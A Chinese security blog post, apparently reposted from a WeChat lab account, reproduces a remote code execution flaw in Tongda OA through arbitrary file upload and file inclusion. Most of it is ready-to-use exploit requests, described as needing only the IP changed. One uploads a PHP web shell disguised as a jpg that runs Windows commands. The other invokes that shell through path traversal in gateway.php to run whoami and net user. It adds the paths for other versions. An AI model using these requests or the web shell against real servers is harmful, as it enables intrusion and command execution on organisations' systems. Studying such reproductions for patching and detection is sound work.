通达OA任意文件上传+文件包含导致RCE漏洞复现

admin
admin
admin
138107
文章
113
评论
2022年7月25日04:49:24评论190 views字数 1849阅读6分9秒阅读模式

通达OA任意文件上传+文件包含导致RCE漏洞复现

漏洞危害

该漏洞可导致命令执行。

影响范围

V11版、2017版、2016版、2015版、2013增强版、2013

漏洞复现

通达V11下载地址

链接:https://pan.baidu.com/s/1Mpk82eAAUYtIHKaLAeTOcg

提取码:o5bw

解压之后,访问exe默认安装就行。

通达OA任意文件上传+文件包含导致RCE漏洞复现

访问任意文件上传路径http://127.0.0.1/ispirit/im/upload.php

通达OA任意文件上传+文件包含导致RCE漏洞复现

EXP上传请求包(只需要更改ip地址即可):

POST /ispirit/im/upload.php HTTP/1.1Host: 127.0.0.1Content-Length: 658Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGBAccept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5Cookie: PHPSESSID=123Connection: close
------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="UPLOAD_MODE"
2------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="P"
123------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="DEST_UID"
1------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="ATTACHMENT"; filename="jpg"Content-Type: image/jpeg
<?php$command=$_POST['cmd'];$wsh = new COM('WScript.shell');$exec = $wsh->exec("cmd /c ".$command);$stdout = $exec->StdOut();$stroutput = $stdout->ReadAll();echo $stroutput;?>------WebKitFormBoundarypyfBh1YB4pV8McGB--

上传图片马成功,返回包里面有图片马的路径以及文件名

通达OA任意文件上传+文件包含导致RCE漏洞复现

访问本地文件包含漏洞

http://127.0.0.1/ispirit/interface/gateway.php

通达OA任意文件上传+文件包含导致RCE漏洞复现

EXP命令执行请求包(只需修改ip地址和图片马地址即可,图片马地址在上传的返回包里面有):

POST /ispirit/interface/gateway.php HTTP/1.1Host: 127.0.0.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.21.0Content-Length: 69Content-Type: application/x-www-form-urlencoded
json={"url":"/general/../../attach/im/2006/342950372.jpg"}&cmd=whoami

执行命令whoami成功

通达OA任意文件上传+文件包含导致RCE漏洞复现

执行命令net user成功

通达OA任意文件上传+文件包含导致RCE漏洞复现

有些版本gateway.php路径不同

2013:

/ ispirit/ im/ upload. php

 

/ ispirit/ interface/ gateway . php

2017

/ispirit/ im/ upload. php

 

/ mac/ gateway. Php

原文始发于微信公众号(赛瑞攻防实验室):通达OA任意文件上传+文件包含导致RCE漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月25日04:49:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   通达OA任意文件上传+文件包含导致RCE漏洞复现https://cn-sec.com/archives/886873.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息